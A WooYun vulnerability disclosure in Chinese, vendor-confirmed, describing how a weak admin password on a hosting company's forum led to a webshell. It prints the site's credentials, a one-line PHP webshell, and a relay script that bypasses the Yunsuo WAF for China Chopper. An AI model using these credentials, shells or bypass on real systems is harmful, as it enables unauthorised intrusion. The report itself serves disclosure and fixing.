华夏名网某分站弱口令可Getshell(过云锁waf案例)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170867

漏洞标题：华夏名网某分站弱口令可Getshell(过云锁waf案例)

漏洞作者：路人甲

提交时间：2016-01-18 15:57

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-18：细节已通知厂商并且等待厂商处理中
2016-01-18：厂商已经确认，细节仅向厂商公开
2016-01-28：细节向核心白帽子及相关领域专家公开
2016-02-07：细节向普通白帽子公开
2016-02-17：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

华夏名网某分站弱口令可getshell(过云锁waf案例)

详细说明：

直接进入正题吧，这次的站点是http://bbs.sudu.cn/
弱口令：用户名admin 密码qwer

进后台看了一下，是Discuz! X3.2 Release 20140603版本，从前台少的可怜的用户数量来看，未打补丁的可能性比较大，那就尝试getshell吧，参考
WooYun: Discuz3.2后台文件包含漏洞可后台拿shell
具体操作过程就不啰嗦了，这里面有个小细节，一定要把服务器具体IP添加到本地host里面去，否则云锁waf会拦截的(至于怎么获得具体IP，最简单的是发送邮件测试)
通过后台“文件检验”功能，我们能清楚的看到一句话文件成功生成了

我们浏览器访问看看

被云锁waf拦截了，估计菜刀肯定也连不了

果不其然，也被拦了，乌云zone翻了下前辈们的经验之谈，终于突破了，重点请往下看
1、变形一句话

<?php
$_REQUEST['a']($_REQUEST['b']);
?>

按上面getshell的方法重新将一句话写入根目录，得访问地址http://bbs.sudu.cn/help.php
测试一下http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();

2、新建shell.php，填入菜刀中转脚本

<?php
$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址
$poststr='';
$i=0;
foreach($_POST as $k=>$v)
{
  if(strstr($v, "base64_decode"))
  {
    $v=str_replace("base64_decode(","",$v);
    $v=str_replace("))",")",$v);
  }
  else
  {
    if($k==="z0")
      $v=base64_decode($v);
  }
  $pp=$k."=".urlencode($v);
  //echo($pp);
  if($i!=0)
  {
    $poststr=$poststr."&".$pp;
  }
  else
  {  
    $poststr=$pp;
  }
  $i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>

3、本地搭建php环境，将中转脚本置于中，菜刀中连接，
地址处填http://127.0.0.1:8004/shell.php?a=assert 密码处填b

成功突破，如图

漏洞证明：

修复方案：

1、强壮弱口令
2、开源程序及时打补丁

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2016-01-18 16:30

厂商回复：

这是已经放弃维护的网站，里面不牵涉主站数据，仅有少量用户注册，后期都已经关闭了用户注册。已经提交公司审核，估计是会升级或者关停此服务器。
也谢谢白帽子对我们公司的帮助

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170867

漏洞标题：华夏名网某分站弱口令可Getshell(过云锁waf案例)

相关厂商：华夏名网

漏洞作者：路人甲

提交时间：2016-01-18 15:57

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170867

漏洞标题：华夏名网某分站弱口令可Getshell(过云锁waf案例)

相关厂商：华夏名网

漏洞作者： 路人甲

提交时间：2016-01-18 15:57

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170867"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云